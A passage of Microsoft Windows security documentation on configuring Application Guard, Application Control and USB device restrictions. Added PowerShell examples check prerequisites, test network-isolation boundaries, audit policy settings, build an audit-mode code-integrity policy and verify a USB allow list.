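    # Enterprise needs 1709 or higher; Pro needs 1803 or higher (standalone mode).
    $minimumVersion = if ($ci.OsName -match 'Enterprise') { 1709 } else { 1803 }

    # When a hypervisor is already running, the HyperVRequirement* properties are
    # $null because the hardware checks no longer apply; treat that as satisfied.
    $hv = [bool]$ci.HyperVisorPresent

    $checks = [ordered]@{
        '64-bit operating system'            = ($ci.OsArchitecture -like '64*')
        'Enterprise or Pro edition'          = ($ci.OsName -match 'Enterprise|Pro')
        "Version $minimumVersion or higher"  = ([int]$ci.WindowsVersion -ge $minimumVersion)
        'Virtualization enabled in firmware' = ($hv -or [bool]$ci.HyperVRequirementVirtualizationFirmwareEnabled)
        'Second Level Address Translation'   = ($hv -or [bool]$ci.HyperVRequirementSecondLevelAddressTranslation)
        'VM monitor mode extensions'         = ($hv -or [bool]$ci.HyperVRequirementVMMonitorModeExtensions)
    }

    foreach ($name in $checks.Keys) {
        '{0,-36} {1}' -f $name, $(if ($checks[$name]) { 'OK' } else { 'MISSING' })
    }
    return -not ($checks.Values -contains $false)
}

function Enable-Wdag {
    $feature = Get-WindowsOptionalFeature -Online -FeatureName Windows-Defender-ApplicationGuard
    if ($feature.State -eq 'Enabled') {
        Write-Host 'Windows Defender Application Guard is already enabled.'
        return
    }
    # -NoRestart defers the reboot so it can be scheduled; the feature is not
    # usable until the device restarts.
    $result = Enable-WindowsOptionalFeature -Online -FeatureName Windows-Defender-ApplicationGuard -NoRestart
    if ($result.RestartNeeded) { Write-Warning 'Restart the device to complete the installation.' }
}

if (Test-WdagPrerequisites) {
    Enable-Wdag
} else {
    Write-Warning 'Prerequisites not met; Application Guard may not work on this device.'
}
```

The check prints one line per requirement so a failed pilot device shows which prerequisite is missing instead of just failing to start the container later.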
Configure Windows Defender Application Guard policy settings
4/5/2019 • 6 minutes to read

Applies to: Windows Defender Advanced Threat Protection (Windows Defender ATP)
Windows Defender Application Guard (Application Guard) works with Group Policy to help you manage your
organization's computer settings. By using Group Policy, you can configure a setting once, and then copy it onto
many computers. For example, you can set up multiple security settings in a GPO, which is linked to a domain, and
then apply all those settings to every computer in the domain.
Application Guard uses both network isolation and application-specific settings.

Network isolation settings


These settings, located at Computer Configuration\Administrative Templates\Network\Network Isolation,
help you define and manage your company's network boundaries. Application Guard uses this information to
automatically transfer any requests to access the non-corporate resources into the Application Guard container.

NOTE
You must configure either the Enterprise resource domains hosted in the cloud or Private network ranges for apps settings
on your employee devices to successfully turn on Application Guard using enterprise mode.

Policy name: Private network ranges for apps
Supported versions: At least Windows Server 2012, Windows 8, or Windows RT
Description: A comma-separated list of IP address ranges that are in your corporate network. Included endpoints, or endpoints that are included within a specified IP address range, are rendered using Microsoft Edge and won't be accessible from the Application Guard environment.

Policy name: Enterprise resource domains hosted in the cloud
Supported versions: At least Windows Server 2012, Windows 8, or Windows RT
Description: A pipe-separated (|) list of your domain cloud resources. Included endpoints are rendered using Microsoft Edge and won't be accessible from the Application Guard environment. Notes: 1) Include a full domain name (www.contoso.com) in the configuration. 2) You may optionally use "." as a wildcard character to automatically trust subdomains. Configuring ".contoso.com" will automatically trust "subdomain1.contoso.com", "subdomain2.contoso.com", etc.

Policy name: Domains categorized as both work and personal
Supported versions: At least Windows Server 2012, Windows 8, or Windows RT
Description: A comma-separated list of domain names used as both work or personal resources. Included endpoints are rendered using Microsoft Edge and will be accessible from both the Application Guard and the regular Edge environment.
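Getting the boundary wrong either leaks corporate sites into the container (where they cannot reach internal resources) or lets untrusted sites render on the host. The script below is an added example, not from the Microsoft documentation: it applies the three lists exactly as the table describes them (comma-separated IP ranges, pipe-separated cloud domains with the leading-"." wildcard, comma-separated neutral domains) to a set of URLs so a boundary definition can be sanity-checked before it is deployed. The policy values are constructed samples, and only IPv4 ranges are handled.

```powershell
# Added example (not from the Microsoft documentation): apply the three network
# isolation lists to URLs the way the table describes them, to sanity-check a
# boundary definition before deploying it. The policy values below are
# constructed samples; only IPv4 ranges are handled.

$EnterpriseCloudResources = 'www.contoso.com|.contoso.com|contoso.sharepoint.com'  # pipe-separated
$PrivateNetworkRanges     = '10.0.0.0-10.255.255.255,192.168.0.0-192.168.255.255'  # comma-separated
$NeutralDomains           = 'login.microsoftonline.com,onedrive.live.com'          # comma-separated

function ConvertTo-IPv4Number([string]$Address) {
    $bytes = [System.Net.IPAddress]::Parse($Address).GetAddressBytes()
    [Array]::Reverse($bytes)                      # network order -> little-endian for ToUInt32
    [BitConverter]::ToUInt32($bytes, 0)
}

function Test-DomainEntry([string]$HostName, [string]$Entry) {
    if ($Entry.StartsWith('.')) {
        # A leading "." is the wildcard: every subdomain is trusted.
        $suffix = $Entry.TrimStart('.')
        return $HostName.EndsWith('.' + $suffix, [StringComparison]::OrdinalIgnoreCase)
    }
    # Otherwise only the full domain name matches.
    return [string]::Equals($HostName, $Entry, [StringComparison]::OrdinalIgnoreCase)
}

function Test-PrivateRange([string]$Address, [string]$Ranges) {
    $n = ConvertTo-IPv4Number $Address
    foreach ($range in $Ranges.Split(',', [StringSplitOptions]::RemoveEmptyEntries)) {
        $low, $high = $range.Trim().Split('-')
        if ($n -ge (ConvertTo-IPv4Number $low) -and $n -le (ConvertTo-IPv4Number $high)) { return $true }
    }
    return $false
}

function Get-WdagDisposition([string]$Url) {
    $hostName = ([uri]$Url).Host
    $ip = $null
    if ([System.Net.IPAddress]::TryParse($hostName, [ref]$ip) -and
        $ip.AddressFamily -eq [System.Net.Sockets.AddressFamily]::InterNetwork) {
        if (Test-PrivateRange $hostName $PrivateNetworkRanges) { return 'host Edge (private network range)' }
        return 'Application Guard container (IP outside corporate ranges)'
    }
    foreach ($e in $EnterpriseCloudResources.Split('|', [StringSplitOptions]::RemoveEmptyEntries)) {
        if (Test-DomainEntry $hostName $e.Trim()) { return 'host Edge (enterprise cloud resource)' }
    }
    foreach ($e in $NeutralDomains.Split(',', [StringSplitOptions]::RemoveEmptyEntries)) {
        if (Test-DomainEntry $hostName $e.Trim()) { return 'host Edge or container (work and personal)' }
    }
    return 'Application Guard container (non-enterprise)'
}

'https://www.contoso.com/', 'https://hr.contoso.com/', 'https://contoso.com/',
'http://10.1.2.3/', 'https://login.microsoftonline.com/', 'https://example.org/' |
    ForEach-Object { '{0,-40} {1}' -f $_, (Get-WdagDisposition $_) }
```

Note that with the sample lists the apex "contoso.com" lands in the container: the ".contoso.com" wildcard covers subdomains only, so the apex has to be listed as its own full domain name if it is an enterprise resource.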

Application-specific settings
These settings, located at Computer Configuration\Administrative Templates\Windows
Components\Windows Defender Application Guard, can help you to manage your company's
implementation of Application Guard.

Name: Configure Windows Defender Application Guard clipboard settings
Supported versions: Windows 10 Enterprise, 1709 or higher; Windows 10 Pro, 1803 or higher
Description: Determines whether Application Guard can use the clipboard functionality.
Options: Enabled. Turns On the clipboard functionality and lets you choose whether to additionally:
• Disable the clipboard functionality completely when Virtualization Security is enabled.
• Enable copying of certain content from Application Guard into Microsoft Edge.
• Enable copying of certain content from Microsoft Edge into Application Guard.
Important: Allowing copied content to go from Microsoft Edge into Application Guard can cause potential security risks and isn't recommended.
Disabled or not configured. Completely turns Off the clipboard functionality for Application Guard.

Name: Configure Windows Defender Application Guard print settings
Supported versions: Windows 10 Enterprise, 1709 or higher; Windows 10 Pro, 1803 or higher
Description: Determines whether Application Guard can use the print functionality.
Options: Enabled. Turns On the print functionality and lets you choose whether to additionally:
• Enable Application Guard to print into the XPS format.
• Enable Application Guard to print into the PDF format.
• Enable Application Guard to print to locally attached printers.
• Enable Application Guard to print from previously connected network printers. Employees can't search for additional printers.
Disabled or not configured. Completely turns Off the print functionality for Application Guard.

Name: Block enterprise websites to load non-enterprise content in IE and Edge
Supported versions: Windows 10 Enterprise, 1709 or higher
Description: Determines whether to allow Internet access for apps not included on the Allowed Apps list.
Options: Enabled. Prevents network traffic from both Internet Explorer and Microsoft Edge to non-enterprise sites that can't render in the Application Guard container. Note: This may also block assets cached by CDNs and references to analytics sites. Add them to the trusted enterprise resources to avoid broken pages.
Disabled or not configured. Allows Microsoft Edge to render network traffic to non-enterprise sites that can't render in Application Guard.

Name: Allow Persistence
Supported versions: Windows 10 Enterprise, 1709 or higher; Windows 10 Pro, 1803 or higher
Description: Determines whether data persists across different sessions in Windows Defender Application Guard.
Options: Enabled. Application Guard saves user-downloaded files and other items (such as cookies, Favorites, and so on) for use in future Application Guard sessions.
Disabled or not configured. All user data within Application Guard is reset between sessions.
Note: If you later decide to stop supporting data persistence for your employees, you can use our Windows-provided utility to reset the container and to discard any personal data. To reset the container:
1. Open a command-line program and navigate to Windows/System32.
2. Type wdagtool.exe cleanup. The container environment is reset, retaining only the employee-generated data.
3. Type wdagtool.exe cleanup RESET_PERSISTENCE_LAYER. The container environment is reset, including discarding all employee-generated data.

Name: Turn on Windows Defender Application Guard in Enterprise Mode
Supported versions: Windows 10 Enterprise, 1709 or higher
Description: Determines whether to turn on Application Guard for Microsoft Edge.
Options: Enabled. Turns on Application Guard for Microsoft Edge, honoring the network isolation settings and rendering non-enterprise domains in the Application Guard container. Be aware that Application Guard won't actually be turned On unless the required prerequisites and network isolation settings are already set on the device.
Disabled. Turns Off Application Guard, allowing all apps to run in Microsoft Edge.

Name: Allow files to download to host operating system
Supported versions: Windows 10 Enterprise, 1803 or higher
Description: Determines whether to save downloaded files to the host operating system from the Windows Defender Application Guard container.
Options: Enabled. Allows users to save downloaded files from the Windows Defender Application Guard container to the host operating system.
Disabled or not configured. Users are not able to save downloaded files from Application Guard to the host operating system.

Name: Allow hardware-accelerated rendering for Windows Defender Application Guard
Supported versions: Windows 10 Enterprise, 1803 or higher; Windows 10 Pro, 1803 or higher
Description: Determines whether Windows Defender Application Guard renders graphics using hardware or software acceleration.
Options: Enabled. Windows Defender Application Guard uses Hyper-V to access supported, high-security rendering graphics hardware (GPUs). These GPUs improve rendering performance and battery life while using Windows Defender Application Guard, particularly for video playback and other graphics-intensive use cases. If this setting is enabled without connecting any high-security rendering graphics hardware, Windows Defender Application Guard will automatically revert to software-based (CPU) rendering.
Important: Be aware that enabling this setting with potentially compromised graphics devices or drivers might pose a risk to the host device.
Disabled or not configured. Windows Defender Application Guard uses software-based (CPU) rendering and won't load any third-party graphics drivers or interact with any connected graphics hardware.

Name: Allow camera and microphone access in Windows Defender Application Guard
Supported versions: Windows 10 Enterprise, 1809 or higher; Windows 10 Pro, 1809 or higher
Description: Determines whether to allow camera and microphone access inside Windows Defender Application Guard.
Options: Enabled. Applications inside Windows Defender Application Guard are able to access the camera and microphone on the user's device.
Important: Be aware that enabling this policy with a potentially compromised container could bypass camera and microphone permissions and access the camera and microphone without the user's knowledge.
Disabled or not configured. Applications inside Windows Defender Application Guard are unable to access the camera and microphone on the user's device.

Name: Allow Windows Defender Application Guard to use Root Certificate Authorities from a user's device
Supported versions: Windows 10 Enterprise, 1809 or higher; Windows 10 Pro, 1809 or higher
Description: Determines whether Root Certificates are shared with Windows Defender Application Guard.
Options: Enabled. Certificates matching the specified thumbprint are transferred into the container. Use a comma to separate multiple certificates.
Disabled or not configured. Certificates are not shared with Windows Defender Application Guard.

Name: Allow users to trust files that open in Windows Defender Application Guard
Supported versions: Windows 10 Enterprise, 1809 or higher
Description: Determines whether users are able to manually trust untrusted files to open them on the host.
Options: Enabled. Users are able to manually trust files or trust files after an antivirus check.
Disabled or not configured. Users are unable to manually trust files and files continue to open in Windows Defender Application Guard.
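Several of the settings above carry an "Important" warning (clipboard from Edge into the container, camera and microphone, hardware-accelerated rendering), and others widen the container boundary (files to host, persistence). The script below is an added example, not from the Microsoft documentation: it reads the policy values Group Policy applies on a device and flags the combinations the table calls out. It assumes the settings are written under HKLM\SOFTWARE\Policies\Microsoft\AppHVSI with the value names shown, and that AppHVSIClipboardSettings encodes 1 = container to host, 2 = host to container, 3 = both; verify those assumptions against the ADMX before relying on the report.

```powershell
# Added example (not from the Microsoft documentation): audit the effective
# Application Guard policy on a device against the settings the table flags as
# risky. Assumptions: Group Policy writes these settings under
# HKLM\SOFTWARE\Policies\Microsoft\AppHVSI with the value names used below, and
# AppHVSIClipboardSettings uses 1 = container to host, 2 = host to container, 3 = both.

$PolicyKey = 'HKLM:\SOFTWARE\Policies\Microsoft\AppHVSI'

# Each check: value name, predicate that marks a risky configuration, and why.
$Checks = @(
    @{ Name = 'AllowAppHVSI_ProviderSet';         Risky = { param($v) $v -eq 0 }
       Why  = 'Enterprise mode is off; all sites render in the host browser' }
    @{ Name = 'AppHVSIClipboardSettings';         Risky = { param($v) $v -in 2, 3 }
       Why  = 'Clipboard from Microsoft Edge into the container is allowed (not recommended)' }
    @{ Name = 'AllowCameraMicrophoneRedirection'; Risky = { param($v) $v -eq 1 }
       Why  = 'A compromised container could reach the camera and microphone' }
    @{ Name = 'AllowVirtualGPU';                  Risky = { param($v) $v -eq 1 }
       Why  = 'Host exposed to third-party graphics drivers and hardware' }
    @{ Name = 'SaveFilesToHost';                  Risky = { param($v) $v -eq 1 }
       Why  = 'Downloaded files can leave the container for the host' }
    @{ Name = 'AllowPersistence';                 Risky = { param($v) $v -eq 1 }
       Why  = 'Cookies, favorites and downloads persist across sessions' }
)

function Get-WdagPolicyReport {
    # Missing key or value means "not configured", which the table treats as the
    # restrictive default for every setting except enterprise mode itself.
    $props = Get-ItemProperty -Path $PolicyKey -ErrorAction SilentlyContinue
    foreach ($c in $Checks) {
        $value = if ($props) { $props.($c.Name) } else { $null }
        $flag = 'ok'
        if ($null -eq $value) { $flag = 'not configured' } elseif (& $c.Risky $value) { $flag = 'REVIEW' }
        [pscustomobject]@{
            Setting = $c.Name
            Value   = if ($null -eq $value) { '-' } else { $value }
            Flag    = $flag
            Note    = $c.Why
        }
    }
}

Get-WdagPolicyReport | Format-Table -AutoSize
```

A "REVIEW" line is not necessarily wrong (persistence or saving files to the host may be a deliberate business decision), but each one should be a documented choice rather than a default that nobody looked at.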
Windows Defender Application Control
4/5/2019 • 2 minutes to read

Applies to:
Windows 10
Windows Server 2016
Windows Server 2019
With thousands of new malicious files created every day, using traditional methods like antivirus solutions—
signature-based detection to fight against malware—provides an inadequate defense against new attacks. In most
organizations, information is the most valuable asset, and ensuring that only approved users have access to that
information is imperative.
However, when a user runs a process, that process has the same level of access to data that the user has. As a
result, sensitive information could easily be deleted or transmitted out of the organization if a user knowingly or
unknowingly runs malicious software.
Application control is a crucial line of defense for protecting enterprises given today’s threat landscape, and it has
an inherent advantage over traditional antivirus solutions. Specifically, application control moves away from the
traditional application trust model where all applications are assumed trustworthy by default to one where
applications must earn trust in order to run. Many organizations, like the Australian Signals Directorate,
understand this and frequently cite application control as one of the most effective means for addressing the
threat of executable file-based malware (.exe, .dll, etc.).
Windows Defender Application Control (WDAC) can help mitigate these types of security threats by restricting the
applications that users are allowed to run and the code that runs in the System Core (kernel). WDAC policies also
block unsigned scripts and MSIs, and Windows PowerShell runs in Constrained Language Mode.

NOTE
Prior to Windows 10, version 1709, Windows Defender Application Control was known as configurable code integrity
policies.

WDAC System Requirements


WDAC policies can only be created on computers beginning with Windows 10 Enterprise or Professional editions
or Windows Server 2016. They can be applied to computers running any edition of Windows 10 or Windows
Server 2016 and optionally managed via Mobile Device Management (MDM), such as Microsoft Intune. Group
Policy or Intune can be used to distribute WDAC policies.

New and changed functionality


Prior to Windows 10, version 1709, Windows Defender Application Control was known as Windows Defender
Device Guard configurable code integrity policies.
Beginning with Windows 10, version 1703, you can use WDAC not only to control applications, but also to control
whether specific plug-ins, add-ins, and modules can run from specific apps (such as a line-of-business application
or a browser). For more information, see Use a Windows Defender Application Control policy to control specific
plug-ins, add-ins, and modules.
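The overview says policies are created on an Enterprise or Professional machine and then distributed; the usual first step is an audit-mode policy built from a reference computer, which logs what would have been blocked without enforcing anything. The script below is an added example, not from the Microsoft documentation or the WDAC design guide it points to; it uses the ConfigCI cmdlets (New-CIPolicy, Set-RuleOption, ConvertFrom-CIPolicy). The output paths are assumptions for this example.

```powershell
# Added example (not from the Microsoft documentation): build a WDAC policy in
# audit mode from a reference computer with the ConfigCI cmdlets, compile it to
# the binary format the kernel loads, and show how a script can tell whether it
# is running under an enforced policy. Paths are assumptions for this example.

$PolicyXml = 'C:\WDAC\AuditPolicy.xml'
$PolicyBin = 'C:\WDAC\SIPolicy.p7b'   # single-policy format; the device path is
                                       # C:\Windows\System32\CodeIntegrity\SIPolicy.p7b

function New-WdacAuditPolicy {
    New-Item -ItemType Directory -Path (Split-Path $PolicyXml) -Force | Out-Null

    # Scan the reference image. -Level Publisher trusts by signing publisher so
    # updates keep working; -Fallback Hash covers unsigned files with hash rules;
    # -UserPEs includes user-mode binaries, not only kernel drivers.
    New-CIPolicy -Level Publisher -Fallback Hash -ScanPath 'C:\' -UserPEs -FilePath $PolicyXml

    # Option 3 = Enabled:Audit Mode. Violations are written to the
    # Microsoft-Windows-CodeIntegrity/Operational log instead of being blocked,
    # which is what you review before flipping the policy to enforcement.
    Set-RuleOption -FilePath $PolicyXml -Option 3

    # Compile the XML into the binary the kernel consumes.
    ConvertFrom-CIPolicy -XmlFilePath $PolicyXml -BinaryFilePath $PolicyBin
}

function Get-WdacAuditEvents {
    # Audit events from the policy; 3076 is the audit-mode "would have blocked" event.
    Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-CodeIntegrity/Operational'; Id = 3076 } -ErrorAction SilentlyContinue |
        Select-Object TimeCreated, Message
}

function Get-PowerShellLanguageMode {
    # Under an enforced WDAC policy PowerShell runs in ConstrainedLanguage mode,
    # so a management script can detect that it is subject to the policy.
    $ExecutionContext.SessionState.LanguageMode
}

New-WdacAuditPolicy
Get-WdacAuditEvents | Select-Object -First 20
Get-PowerShellLanguageMode
```

Removing Option 3 later (Set-RuleOption -FilePath $PolicyXml -Option 3 -Delete) and recompiling produces the enforced policy; the distribution itself is done through Group Policy or Intune as the overview says.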
See also
WDAC design guide
WDAC deployment guide
How to control USB devices and other removable media using Windows Defender ATP
4/5/2019 • 7 minutes to read

Applies to: Windows Defender Advanced Threat Protection (Windows Defender ATP)
Microsoft recommends a layered approach to securing removable media, and Windows Defender ATP provides
multiple monitoring and control features to help prevent threats in unauthorized peripherals from compromising
your devices:
1. Prevent threats introduced by removable storage devices by enabling:
Windows Defender Antivirus real-time protection (RTP) to scan removable storage for malware.
The Exploit Guard Attack Surface Reduction (ASR) USB rule to block untrusted and unsigned processes
that run from USB.
Direct Memory Access (DMA) protection settings to mitigate DMA attacks, including Kernel DMA
Protection for Thunderbolt and blocking DMA until a user signs in.
2. Detect plug and play connected events for peripherals in Windows Defender ATP advanced hunting.
Identify or investigate suspicious usage activity. Create customized alerts based on these PnP events or
any other Windows Defender ATP events with custom detection rules.
3. Respond to threats from peripherals in real time based on properties reported by each peripheral:
Granular configuration to deny write access to removable disks and approve or deny devices by USB
vendor code, product code, device IDs, or a combination.
Flexible policy assignment of device installation settings based on an individual or group of Azure Active
Directory (Azure AD) users and devices.
These threat reduction measures help prevent malware from coming into your environment. To protect enterprise
data from leaving your environment, you can also configure data loss prevention measures. For example, on
Windows 10 devices you can configure BitLocker and Windows Information Protection, which will encrypt
company data even if it is stored on a personal device, or use the Storage/RemovableDiskDenyWriteAccess CSP to
deny write access to removable disks. Additionally, you can classify and protect files on Windows devices (including
their mounted USB devices) by using Windows Defender ATP and Azure Information Protection.

Prevent threats from removable storage


Windows Defender ATP can help identify and block malicious files on allowed removable storage peripherals.
Enable Windows Defender Antivirus Scanning
Protecting authorized removable storage with Windows Defender Antivirus requires enabling real-time protection
or scheduling scans and configuring removable drives for scans.
If real-time protection is enabled, files are scanned before they are accessed and executed. The scanning scope
includes all files, including those on mounted removable devices such as USB drives. You can optionally run a
PowerShell script to perform a custom scan of a USB drive after it is mounted, so that Windows Defender
Antivirus starts scanning all files on a removable device once the removable device is attached. However, we
recommend enabling real-time protection for improved scanning performance, especially for large storage
devices.
If scheduled scans are used, then you need to disable the DisableRemovableDriveScanning setting (enabled by
default) to scan the removable device during a full scan. Removable devices are scanned during a quick or
custom scan regardless of the DisableRemovableDriveScanning setting.

NOTE
We recommend enabling real-time monitoring for scanning. In Intune, you can enable real-time monitoring for Windows 10
in Device Restrictions > Configure > Windows Defender Antivirus > Real-time monitoring.

Block untrusted and unsigned processes on USB peripherals


End-users might plug in removable devices that are infected with malware. To prevent infections, a company can
block USB files that are unsigned or untrusted. Alternatively, companies can leverage the audit feature of attack
surface reduction rules to monitor the activity of untrusted and unsigned processes that execute on a USB
peripheral. This can be done by setting Untrusted and unsigned processes that run from USB to either Block
or Audit only, respectively. With this rule, admins can prevent or audit unsigned or untrusted executable files from
running from USB removable drives, including SD cards. Affected file types include executable files (such as .exe,
.dll, or .scr) and script files such as a PowerShell (.ps), VisualBasic (.vbs), or JavaScript (.js) files.
These settings require enabling real-time protection.
1. Sign in to the Microsoft Azure portal.
2. Click Intune > Device configuration > Profiles > Create profile.

3. Use the following settings:


Name: Type a name for the profile
Description: Type a description
Platform: Windows 10 or later
Profile type: Endpoint protection
4. Click Configure > Windows Defender Exploit Guard > Attack Surface Reduction.
5. For Unsigned and untrusted processes that run from USB, choose Block.
6. Click OK to close Attack Surface Reduction, Windows Defender Exploit Guard, and Endpoint
protection.
7. Click Create to save the profile.
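The two sections above (removable drive scanning and the USB ASR rule) can also be configured directly on a device with the Defender PowerShell cmdlets, which is convenient for a pilot before the Intune profile goes out. The script below is an added example, not from the Microsoft documentation: it enables real-time protection (which the ASR rule requires), includes removable drives in full scans, stages the USB rule in audit mode as the text suggests, and registers the on-mount custom scan the text mentions. The ASR rule GUID is the one Microsoft publishes for "Block untrusted and unsigned processes that run from USB"; verify it against current documentation before deploying.

```powershell
# Added example (not from the Microsoft documentation): apply the removable
# storage protections from the two sections above with the Defender PowerShell
# cmdlets (an alternative to the Intune profile), and register the on-mount
# custom scan the text mentions. The ASR rule GUID is the one Microsoft publishes
# for "Block untrusted and unsigned processes that run from USB"; verify it
# against current documentation before deploying.

$UsbAsrRuleId = 'b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4'

function Set-RemovableStorageProtection {
    param([ValidateSet('AuditMode', 'Enabled')][string]$AsrAction = 'AuditMode')

    # Real-time protection scans files before they are accessed or executed,
    # including files on mounted removable devices; the ASR rule requires it.
    Set-MpPreference -DisableRealtimeMonitoring $false

    # Include removable drives in scheduled full scans. The setting is named
    # "Disable..." and is on by default, so $false turns removable scanning on.
    Set-MpPreference -DisableRemovableDriveScanning $false

    # Stage the USB rule in audit mode first; switch to 'Enabled' (block) once
    # the audit events show no legitimate processes being caught.
    Add-MpPreference -AttackSurfaceReductionRules_Ids $UsbAsrRuleId `
                     -AttackSurfaceReductionRules_Actions $AsrAction
}

function Register-RemovableDriveScan {
    # Win32_VolumeChangeEvent with EventType 2 fires on device arrival and
    # carries the new drive letter; DriveType 2 identifies removable disks.
    # The subscription lives only in the current PowerShell session.
    $query = 'SELECT * FROM Win32_VolumeChangeEvent WHERE EventType = 2'
    Register-CimIndicationEvent -Query $query -SourceIdentifier 'RemovableDriveArrival' -Action {
        $drive = $Event.SourceEventArgs.NewEvent.DriveName
        $disk = Get-CimInstance -ClassName Win32_LogicalDisk -Filter "DeviceID='$drive'"
        if ($disk.DriveType -eq 2) {
            Start-MpScan -ScanType CustomScan -ScanPath "$drive\"
        }
    } | Out-Null
}

function Get-RemovableStorageProtection {
    # Show the resulting preferences so the change can be verified on the device.
    Get-MpPreference | Select-Object DisableRealtimeMonitoring, DisableRemovableDriveScanning,
        AttackSurfaceReductionRules_Ids, AttackSurfaceReductionRules_Actions
}

Set-RemovableStorageProtection -AsrAction AuditMode
Register-RemovableDriveScan
Get-RemovableStorageProtection
```

As the text notes, real-time protection already scans files on a removable device when they are accessed, so the on-mount custom scan is an addition for environments that want the whole device scanned at insertion time rather than a replacement for real-time protection.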
Protect against Direct Memory Access (DMA) attacks
DMA attacks can lead to disclosure of sensitive information residing on a PC, or even injection of malware that
allows attackers to bypass the lock screen or control PCs remotely. The following settings help to prevent DMA
attacks:
1. Beginning with Windows 10 version 1803, Microsoft introduced Kernel DMA Protection for Thunderbolt to
provide native protection against DMA attacks via Thunderbolt ports. Kernel DMA Protection for
Thunderbolt is enabled by system manufacturers and cannot be turned on or off by users.
Beginning with Windows 10 version 1809, you can adjust the level of Kernel DMA Protection by configuring
the DMA Guard CSP. This is an additional control for peripherals that don't support device memory
isolation (also known as DMA-remapping). Memory isolation allows the OS to leverage the I/O Memory
Management Unit (IOMMU) of a device to block unallowed I/O, or memory access, by the peripheral
(memory sandboxing). In other words, the OS assigns a certain memory range to the peripheral. If the
peripheral attempts to read/write to memory outside of the assigned range, the OS blocks it.
Peripherals that support device memory isolation can always connect. Peripherals that don't can be blocked,
allowed, or allowed only after the user signs in (default).
2. On Windows 10 systems that do not support Kernel DMA Protection, you can:
Block DMA until a user signs in
Block all connections via the Thunderbolt ports (including USB devices)

Detect plug and play connected events


You can view plug and play connected events in Windows Defender ATP advanced hunting to identify suspicious
usage activity or perform internal investigations. For examples of Windows Defender ATP advanced hunting
queries, see the Windows Defender ATP hunting queries GitHub repo. Based on any Windows Defender ATP
event, including the plug and play events, you can create custom alerts using the Windows Defender ATP custom
detection rule feature.

Respond to threats
Windows Defender ATP can prevent USB peripherals from being used on devices to help prevent external threats.
It does this by using the properties reported by USB peripherals to determine whether or not they can be installed
and used on the device.

NOTE
Always test and refine these settings with a pilot group of users and devices first before applying them in production.

The following table describes the ways Windows Defender ATP can help prevent installation and usage of USB
peripherals. For more information about controlling USB devices, see the Microsoft Secure blog "WDATP has
protections for USB and removable devices".

Control: Block installation and usage of removable storage
Description: Users can't install or use removable storage.

Control: Only allow installation and usage of specifically approved peripherals
Description: Users can only install and use approved peripherals that report specific properties in their firmware.

Control: Prevent installation of specifically prohibited peripherals
Description: Users can't install or use prohibited peripherals that report specific properties in their firmware.

NOTE
Because an unauthorized USB peripheral can have firmware that spoofs its USB properties, we recommend only allowing
specifically approved USB peripherals and limiting the users who can access them.

Block installation and usage of removable storage


1. Sign in to the Microsoft Azure portal.
2. Click Intune > Device configuration > Profiles > Create profile.
3. Use the following settings:
Name: Type a name for the profile
Description: Type a description
Platform: Windows 10 and later
Profile type: Device restrictions

4. Click Configure > General.


5. For Removable storage and USB connection (mobile only), choose Block. Removable storage
includes USB drives, where USB connection (mobile only) excludes USB charging but includes other
USB connections on mobile devices only.
6. Click OK to close General settings and Device restrictions.
7. Click Create to save the profile.
Only allow installation and usage of specifically approved peripherals
Windows Defender ATP allows installation and usage of only specifically approved peripherals by creating a
custom profile in Intune and configuring DeviceInstallation policies. For example, this custom profile allows
installation and usage of USB devices with hardware IDs "USBSTOR\DiskVendorCo" and
"USBSTOR\DiskSanDisk_Cruzer_Glide_3.0".
Peripherals that are allowed to be installed can be specified by their hardware identity. For a list of common
identifier structures, see Device Identifier Formats. Test the configuration prior to rolling it out to ensure it blocks
and allows the devices expected. Ideally test various instances of the hardware. For example, test multiple USB keys
rather than only one.
For a SyncML example that allows installation of specific device IDs, see
DeviceInstallation/AllowInstallationOfMatchingDeviceIDs CSP. To allow specific device classes, see
DeviceInstallation/AllowInstallationOfMatchingDeviceSetupClasses CSP. Allowing installation of specific devices
requires also enabling DeviceInstallation/PreventInstallationOfDevicesNotDescribedByOtherPolicySettings.
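The text recommends testing the allow list against several physical instances of the hardware before rollout. The script below is an added example, not from the Microsoft documentation: it enumerates the USB storage devices attached to the test machine, reads the hardware IDs each one reports (the same strings a DeviceInstallation policy matches against), and reports whether any of them appears in the approved list. The two approved IDs are the ones used in the article's example; the Get-PnpDevice and Get-PnpDeviceProperty cmdlets are from the PnpDevice module.

```powershell
# Added example (not from the Microsoft documentation): before rolling out an
# allow-list policy, enumerate the USB storage devices currently attached and
# check their reported hardware IDs against the approved list, so the pilot
# devices you intend to allow are actually covered.

# Approved hardware IDs from the article's example; replace with your own.
$ApprovedHardwareIds = @(
    'USBSTOR\DiskVendorCo',
    'USBSTOR\DiskSanDisk_Cruzer_Glide_3.0'
)

function Get-AttachedUsbStorage {
    # USBSTOR enumerates disk-class devices attached over USB; each reports
    # several hardware IDs from most to least specific (vendor+product+revision,
    # vendor+product, vendor, generic disk).
    Get-PnpDevice -Class DiskDrive -PresentOnly -ErrorAction SilentlyContinue |
        Where-Object { $_.InstanceId -like 'USBSTOR\*' } |
        ForEach-Object {
            $ids = (Get-PnpDeviceProperty -InstanceId $_.InstanceId `
                        -KeyName 'DEVPKEY_Device_HardwareIds').Data
            [pscustomobject]@{
                FriendlyName = $_.FriendlyName
                InstanceId   = $_.InstanceId
                HardwareIds  = @($ids)
            }
        }
}

function Test-ApprovedDevice {
    param([string[]]$HardwareIds)
    # A device is approved when any of its reported IDs equals an allowed entry.
    # -contains compares case-insensitively, as Windows treats hardware IDs.
    foreach ($id in $HardwareIds) {
        if ($ApprovedHardwareIds -contains $id) { return $true }
    }
    return $false
}

function Get-UsbAllowListReport {
    foreach ($dev in Get-AttachedUsbStorage) {
        [pscustomobject]@{
            Device     = $dev.FriendlyName
            Approved   = Test-ApprovedDevice -HardwareIds $dev.HardwareIds
            MatchedIds = ($dev.HardwareIds | Where-Object { $ApprovedHardwareIds -contains $_ }) -join '; '
            AllIds     = $dev.HardwareIds -join '; '
        }
    }
}

Get-UsbAllowListReport | Format-List
```

The AllIds column is the useful part when a device unexpectedly shows Approved = False: it shows which vendor/product strings the firmware actually reports, and it also makes visible how generic an entry such as USBSTOR\DiskVendorCo is, since every device from that vendor would match it.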
Prevent installation of specifically prohibited peripherals
Windows Defender ATP blocks installation and usage of prohibited peripherals by using either of these options:
Administrative Templates can block any device with a matching hardware ID or setup class.
Device Installation CSP settings with a custom profile in Intune. You can prevent installation of specific device
IDs or prevent specific device classes.

Related topics
Configure real-time protection for Windows Defender Antivirus
